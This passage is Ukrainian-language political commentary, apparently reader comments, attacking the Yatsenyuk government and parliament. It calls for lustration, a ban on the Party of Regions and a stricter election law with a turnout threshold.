торгівлю, аптечну галузь.. Комісії контролю Захисту прав Споживачив перетворені в відділи випрошування "милостини" для себе та перевіряючих і місцевої влади. Хто може мені пояснити логіку Уряду?Чому Народний Фронт шантажує Президента своїм виходом з Каоліції, якщо ВР дасть відставку Яценюку? Вони що, забули хто їх вибирав? І при рейтингу Уряду(який складає не більше 5%), вони ще й залякують народ? І не треба розповідати як нашому народові дорого обійдуться нові вибори до ВР. Це нам буде набагато дешевше ніж вони розкрадуть. Ми готові до нових виборів в ВР, а якщо нас будуть залякувати, то й до нового Майдану. Наші діди і батьки пережили Голодомор, а тепер цей Уряд застосовує Холодомор і ми повинні відмовитись від послуг цього Уряду! А чи може хтось пояснити чому ні Уряд, ні Президент(зі своєю братією), ні народні депутати не несуть відповідальності за свої дії, або бездіяння? Чому депутаті не можливо зібрати для голосування? А це вже зовсім не складно: не брав участі в результативному голосуванні, без вагомої причини, 3 рази і в такого депутата забирається мандат.Чому люди на виробництвах повинні працювати, а депутати на чолі зі своїм Керівництвом, не можуть звітувати своєму народу, що вони "можновладці", а не слуги цього ж народу? Чому в Комітетах ВР не можуть зібрати Кворум? і чому пан Гройсман вже журналістів перетворив в "зазивал", посилаючи останніх по коридорам та буфетам ВР, щоб загнати до сессійної Зали народних обранців? Хто повинен нести за це відповідальність? Каоліція? А це хто і як? Ні,дорогі співвітчизники, ці "слуги" будуть служити тільки собі і собіподібним "жирним тваринам". От ми підійшли до питання "кадрів",чому Люстрація кругом гальмується? Ба, навіть в Мінюсті(неодноразово показують поТБ) де давно відрапортували про її успішне завершення, в кабінети не пускають навіть журналістів. і так в любій галузі. "Шановна" Владо! Президент, Уряд, Народні депутати! Невже ви зовсім не знаєте історії? Народ пам'ятає, що Революції робляться Ентузіастами, а користаються їх результатами Негідники.Чому на відповідальні посади призначаються "виконавці", які повинні бали бути Люстрованими, або ще гірше, затяті корупціонери, не зважаючи з якої партії він виходець? Хтоза це повинен понести відповідальність? І не треба розповідати нам, українцям, що ви якось не додивилися. Недодивилися - повинні бути вигнані разом з таким "виконавцем"! І чому до теперішнього часу не відбувся суд над Партією Регіонів! У вас що мало доказів про антинародну політику цієї партії? чому вона не заборонена судом за антинародну політику, за розкрадання нароного добра, за вбивства та злочини проти українського народу, а всим членам цієї преступної партії треба було заборонити на протязі 15-20 років брати участь в любих виборах до органів місцевих та ВР, призначатися  держслужбовцями любого рівня. Чому це до теперішньої пори не зроблено? Невже не вистачаэ голосів? Так ви опридлюдніть списки голосування і цього буде достатньо для нової люстрації. Адже ви обіцяли це на Майдані! Хто відповість за це невиконання? І оти так, дорогі мої співвітчизники, діється кругом.   Тому треба нове перезавантаження влади, посилення відповідальності всих чиновників від влади, підприємців, за невиконання Законів, а головне, треба міняти Закон "Про вибори", де передбачити, що якщо явка виборців нижче 51%, вибори визнаються такими, що не відбулися і в повторних виборах кандидати, що уже брали участь в виборах визнаних  такими, що не відбулися і не мають права брати участі. Тобто будуть балотуватися нові кандидати до тих пір поки їх не обере народ. І тоді неявка на виборчу дільницю буде розцінюватися як голосуваня проти всіх. І може наш кандидати зрозуміють, що ми їх вибираємо служити, а щоб вони служили краще - треба їж скоротити, всерівно не працюють.   

Уряд Яценюка займається бандитизмом.

Уряд Яценюка займається бандитизмом - нишпорить по кишеням обідраного народу.
Навіть Азаров такого грабіжнецтва серед білого дня не вчиняв.